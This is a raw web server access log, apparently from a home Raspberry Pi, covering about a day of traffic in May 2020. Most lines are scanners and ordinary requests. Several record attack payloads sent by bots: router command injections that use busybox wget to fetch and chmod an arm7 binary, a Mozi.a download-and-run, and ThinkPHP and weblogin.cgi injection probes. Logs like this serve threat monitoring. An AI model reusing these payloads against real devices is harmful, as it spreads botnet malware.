Fri May 29 06:25:07 MDT 2020 06:25:07 up 1 day, 7:30, 1 user, load average: 0.38, 0.27, 0.28 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 Wed22 32:08m 2:47 0.65s /usr/bin/lxsession -s LXDE-pi -e LXDE 207.180.211.90 - - [29/May/2020:12:38:21 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 177.126.129.196 - - [29/May/2020:13:31:08 +0000] "GET / HTTP/1.0" 200 25000 "" "" 162.243.138.182 - - [29/May/2020:13:40:49 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 45.234.216.97 - - [29/May/2020:14:25:50 +0000] "GET / HTTP/1.0" 200 25000 "" "" 223.71.167.165 - - [29/May/2020:15:42:57 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" 185.95.186.6 - - [29/May/2020:15:54:44 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 141.98.10.47 - - [29/May/2020:16:12:34 +0000] "GET /vicidial/admin.php?ADD=140000000000 HTTP/1.1" 404 0 "" "" 75.148.156.244 - - [29/May/2020:16:16:30 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" "" 75.148.156.244 - - [29/May/2020:16:16:30 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 151.75.124.23 - - [29/May/2020:17:09:27 +0000] "GET / HTTP/1.0" 200 25000 "" "" 41.139.175.13 - - [29/May/2020:17:12:28 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 187.133.243.85 - - [29/May/2020:17:37:06 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 94.19.45.189 - - [29/May/2020:17:42:50 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 162.243.138.70 - - [29/May/2020:17:55:22 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 179.99.20.155 - - [29/May/2020:18:25:00 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 176.123.60.152 - - [29/May/2020:19:00:05 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 162.250.19.7 - - [29/May/2020:19:35:15 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Android 6.0; Tablet; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [29/May/2020:19:36:10 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 172.104.108.109 - - [29/May/2020:19:42:32 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0" 193.118.53.210 - - [29/May/2020:20:28:16 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 212.33.243.115 - - [29/May/2020:21:18:08 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 178.173.220.89 - - [29/May/2020:22:10:28 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 207.180.226.26 - - [29/May/2020:23:34:35 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 162.250.19.7 - - [30/May/2020:00:31:45 +0000] "GET /videos/knight-2020-05-20underground-prisons-guillotines-banned-video.mp4 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Android 6.0; Tablet; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [30/May/2020:00:32:31 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [30/May/2020:00:32:54 +0000] "GET /videos/knight-2020-05-20-underground-prisons-guillotines-banned-video.mp4 HTTP/1.1" 200 25476974 "" "Mozilla/5.0 (Android 6.0; Tablet; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [30/May/2020:00:32:55 +0000] "GET /videos/knight-2020-05-20underground-prisons-guillotines-banned-video.mp4 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Android 6.0; Tablet; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [30/May/2020:00:33:03 +0000] "GET /videos/knight2020-05-20underground-prisons-guillotines-banned-video.mp4 HTTP/1.1" 404 0 "http://162.250.19.7/videos/" "Mozilla/5.0 (Android 6.0; Tablet; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [30/May/2020:00:33:04 +0000] "GET /videos/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Android 6.0; Tablet; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [30/May/2020:00:33:10 +0000] "GET /videos/knight2020-05-20underground-prisons-guillotines-banned-video.mp4 HTTP/1.1" 404 0 "http://162.250.19.7/videos/" "Mozilla/5.0 (Android 6.0; Tablet; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [30/May/2020:00:33:20 +0000] "GET /videos/knight-2020-05-20underground-prisons-guillotines-banned-video.mp4 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Android 6.0; Tablet; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [30/May/2020:00:33:31 +0000] "GET /videos/knight-2020-05-20-underground-prisons-guillotines-banned-video.mp4 HTTP/1.1" 200 9028678 "" "Mozilla/5.0 (Android 6.0; Tablet; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [30/May/2020:00:33:35 +0000] "GET /videos/knight-2020-05-20underground-prisons-guillotines-banned-video.mp4 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Android 6.0; Tablet; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [30/May/2020:00:33:37 +0000] "GET /videos/knight-2020-05-20underground-prisons-guillotines-banned-video.mp4 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Android 6.0; Tablet; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [30/May/2020:00:33:41 +0000] "GET /videos/knight2020-05-20underground-prisons-guillotines-banned-video.mp4 HTTP/1.1" 404 0 "http://162.250.19.7/videos/" "Mozilla/5.0 (Android 6.0; Tablet; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [30/May/2020:00:33:52 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [30/May/2020:00:33:58 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [30/May/2020:00:33:58 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [30/May/2020:00:34:10 +0000] "GET /videos/knight-2020-05-20-underground-prisons-guillotines-banned-video.mp4 HTTP/1.1" 200 16438634 "http://162.250.19.7/videos/" "Mozilla/5.0 (Android 6.0; Tablet; rv:68.0) Gecko/68.0 Firefox/68.0" 109.1.110.59 - - [30/May/2020:00:37:58 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 162.250.19.7 - - [30/May/2020:00:39:38 +0000] "GET /videos/knight-2020-05-20-underground-prisons-guillotines-banned-video.mp4 HTTP/1.1" 206 25386593 "http://162.250.19.7/videos/knight-2020-05-20-underground-prisons-guillotines-banned-video.mp4" "Mozilla/5.0 (Android 6.0; Tablet; rv:68.0) Gecko/68.0 Firefox/68.0" 95.10.163.203 - - [30/May/2020:00:50:06 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 195.54.160.130 - - [30/May/2020:00:51:43 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.130 - - [30/May/2020:01:04:48 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.130 - - [30/May/2020:01:05:30 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.130 - - [30/May/2020:01:25:57 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 61.219.11.153 - - [30/May/2020:01:35:28 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 79.35.46.189 - - [30/May/2020:02:13:42 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 0 "" "Hello, world" 181.129.133.164 - - [30/May/2020:02:36:49 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 181.129.133.164 - - [30/May/2020:02:36:49 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 92.118.160.29 - - [30/May/2020:03:05:31 +0000] "GET / HTTP/1.0" 200 25000 "" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" 104.168.44.229 - - [30/May/2020:03:18:06 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 104.168.44.229 - - [30/May/2020:03:18:12 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 104.168.44.229 - - [30/May/2020:03:18:13 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 104.168.44.229 - - [30/May/2020:03:18:13 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 104.168.44.229 - - [30/May/2020:03:18:13 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 104.168.44.229 - - [30/May/2020:03:18:14 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 104.168.44.229 - - [30/May/2020:03:18:14 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 104.168.44.229 - - [30/May/2020:03:18:14 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 104.168.44.229 - - [30/May/2020:03:18:16 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 104.168.44.229 - - [30/May/2020:03:18:16 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 76.86.89.69 - - [30/May/2020:03:22:27 +0000] "GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1" 404 0 "" "Mozilla/5.0" 76.86.89.69 - - [30/May/2020:03:22:32 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 146.185.142.70 - - [30/May/2020:03:31:30 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 112.213.98.163 - - [30/May/2020:04:06:52 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 112.213.98.163 - - [30/May/2020:04:06:52 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 112.213.98.163 - - [30/May/2020:04:06:52 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 112.213.98.163 - - [30/May/2020:04:06:53 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 112.213.98.163 - - [30/May/2020:04:06:53 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 112.213.98.163 - - [30/May/2020:04:06:54 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 112.213.98.163 - - [30/May/2020:04:06:54 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 112.213.98.163 - - [30/May/2020:04:06:55 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 112.213.98.163 - - [30/May/2020:04:06:55 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 112.213.98.163 - - [30/May/2020:04:06:55 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 178.212.52.92 - - [30/May/2020:04:27:00 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 194.61.24.124 - - [30/May/2020:04:46:21 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 183.91.4.97 - - [30/May/2020:04:49:08 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 183.91.4.97 - - [30/May/2020:04:49:08 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 201.232.53.30 - - [30/May/2020:05:10:33 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 195.54.160.130 - - [30/May/2020:05:38:29 +0000] "POST /api/jsonws/invoke HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 197.255.208.46 - - [30/May/2020:08:15:18 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 41.222.7.170 - - [30/May/2020:08:18:00 +0000] "GET / HTTP/1.0" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 162.243.142.10 - - [30/May/2020:08:27:00 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 92.118.161.13 - - [30/May/2020:09:24:37 +0000] "GET / HTTP/1.1" 200 25000 "" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" 195.136.157.130 - - [30/May/2020:09:37:05 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 139.162.106.181 - - [30/May/2020:10:09:02 +0000] "GET / HTTP/1.1" 200 25000 "" "HTTP Banner Detection (https://security.ipip.net)" 165.16.37.150 - - [30/May/2020:11:17:40 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 120.218.176.237 - - [30/May/2020:11:49:31 +0000] "GET /shell?busybox HTTP/1.1" 400 0 "" "Mozilla/5.0" Sat May 30 06:25:05 MDT 2020 06:25:06 up 2 days, 7:30, 1 user, load average: 0.31, 0.27, 0.36 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 Wed22 2days 3:24 0.65s /usr/bin/lxsession -s LXDE-pi -e LXDE